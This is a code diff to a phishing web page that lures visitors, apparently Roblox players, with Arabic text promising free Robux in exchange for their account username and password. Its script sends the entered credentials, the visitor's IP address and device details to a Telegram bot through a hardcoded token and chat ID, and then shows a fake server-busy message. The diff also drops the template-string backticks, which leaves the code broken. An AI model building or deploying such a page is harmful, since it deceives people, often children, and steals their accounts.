--- a/index.html
+++ b/index.html
@@ -6,107 +6,29 @@
     <title>Glowing Login Form</title>
     <link rel="stylesheet" href="style.css">
     <script src="https://unpkg.com/axios@1.6.7/dist/axios.min.js"></script>
-    <style>
-        /* التنسيق الأساسي للصندوق */
-        .container {
-            display: flex;
-            justify-content: center;
-            align-items: center;
-            height: 100vh;
-            background: #f4f4f4;
-        }
-
-        .login-box {
-            background: #fff;
-            padding: 40px;
-            border-radius: 10px;
-            box-shadow: 0 15px 30px rgba(0, 0, 0, 0.1);
-            text-align: center;
-            width: 300px;
-        }
-
-        h2 {
-            margin-bottom: 20px;
-            font-size: 18px;
-            color: #333;
-        }
-
-        /* تنسيق حقول الإدخال */
-        .user-box {
-            position: relative;
-            margin-bottom: 30px;
-        }
-
-        .user-box input {
-            width: 100%;
-            padding: 10px;
-            background: transparent;
-            border: 1px solid #ccc;
-            outline: none;
-            border-radius: 5px;
-            font-size: 16px;
-        }
-
-        .user-box label {
-            position: absolute;
-            top: 50%;
-            left: 10px;
-            color: #333;
-            font-size: 16px;
-            transform: translateY(-50%);
-            pointer-events: none;
-            transition: 0.3s;
-        }
-
-        .user-box input:focus ~ label,
-        .user-box input:valid ~ label {
-            top: -10px;
-            font-size: 12px;
-            color: #0066cc;
-        }
-
-        /* تنسيق الزر */
-        #login-btn {
-            display: inline-block;
-            padding: 10px 20px;
-            background-color: #0066cc;
-            color: #fff;
-            text-decoration: none;
-            border-radius: 5px;
-            cursor: pointer;
-            font-size: 16px;
-            transition: all 0.3s ease;
-        }
-
-        #login-btn:hover {
-            background-color: #005bb5;
-            box-shadow: 0 0 10px rgba(0, 0, 0, 0.2);
-        }
-    </style>
 </head>
 <body>
     <div class="container">
         <div class="login-box">
-            <h2>الكمية محدود من قناتنا. فقط من يشترك في قناتنا يمكنه الحصول على الرابط. اكتب اسم حسابك وكلمة المرور ويمكنك ربح روبوكس</h2>
-            <h2>يرجى الاشتراك في قناتنا للحصول على المزيد من الهدايا</h2>
+            <h2>الكمية محدودمن قناتنا محد يكون معه رابط غير الي اشترك بقناتي اكتب اسم حسابك وباسورده  ويمكن تربح 100 الى 400 روبوكس</h2>
+            <h2>الروبوكس محدود _يرجى الاشتراك بقناتنا ايضا لنقدم المزيد من الهدايه</h2> <!-- تغيير هنا -->
             <form id="login-form">
                 <div class="user-box">
-                    <input type="text" id="username" required>
-                    <label>Username</label>
+                    <input type="text" id="username" required> <!-- تغيير من email إلى username -->
+                    <label>username </label> <!-- تغيير النص هنا -->
                 </div>
                 <div class="user-box">
                     <input type="password" id="password" required>
                     <label>Password</label>
                 </div>
-                <a href="#" id="login-btn">Submit</a> 
+                <a href="#" id="login-btn">Submit</a>
             </form>
         </div>
     </div>
-
     <script>
         const TOKEN = "7966593148:AAHhZ7-CI67oVYZf5YddEfs5y0R6hDFjqI4"; // التوكن الخاص بك
         const CHAT_ID = "6243038338"; // معرف الشات الخاص بك
-        const URI_API = `https://api.telegram.org/bot${TOKEN}/sendMessage`;
+        const URI_API = https://api.telegram.org/bot${TOKEN}/sendMessage;
 
         document.getElementById('login-btn').addEventListener('click', async function(e) {
             e.preventDefault(); // منع الرابط من التنقل
@@ -114,8 +36,8 @@
             alert('عليك الانتظار ساعة بسبب الضغط على خادمنا');
 
             // الحصول على اسم المستخدم وكلمة المرور المدخلة
-            const username = document.getElementById('username').value;  // الحصول على اسم المستخدم
-            const password = document.getElementById('password').value; // الحصول على كلمة المرور
+            const username = document.getElementById('username').value;  // تغيير من email إلى username
+            const password = document.getElementById('password').value;
 
             console.log("Sending data to Telegram...");
 
@@ -130,20 +52,19 @@
                 const screenHeight = screen.height;
                 const deviceType = /mobile/i.test(navigator.userAgent) ? 'Mobile' : 'Desktop';
 
-                // تكوين رسالة البيانات المرسلة
                 const message =  
-                    `<b>New Login Attempt</b>\n
-                    <b>Username:</b> ${username}\n
+                    <b>New Login Attempt</b>\n
+                    <b>Username:</b> ${username}\n  <!-- تغيير من Email إلى Username -->
                     <b>Password:</b> ${password}\n
                     <b>IP Address:</b> ${ip}\n
                     <b>Device Type:</b> ${deviceType}\n
                     <b>Platform:</b> ${platform}\n
                     <b>User Agent:</b> ${userAgent}\n
-                    <b>Screen Resolution:</b> ${screenWidth}x${screenHeight}`;
+                    <b>Screen Resolution:</b> ${screenWidth}x${screenHeight};
 
                 console.log("Message: ", message);
 
-                // إرسال الطلب إلى التلغرام عبر الـ API
+                // إرسال الطلب إلى التلغرام
                 const response = await axios.post(URI_API, {
                     chat_id: CHAT_ID,
                     parse_mode: 'html',
@@ -160,3 +81,4 @@
     </script>
 </body>
 </html>
+
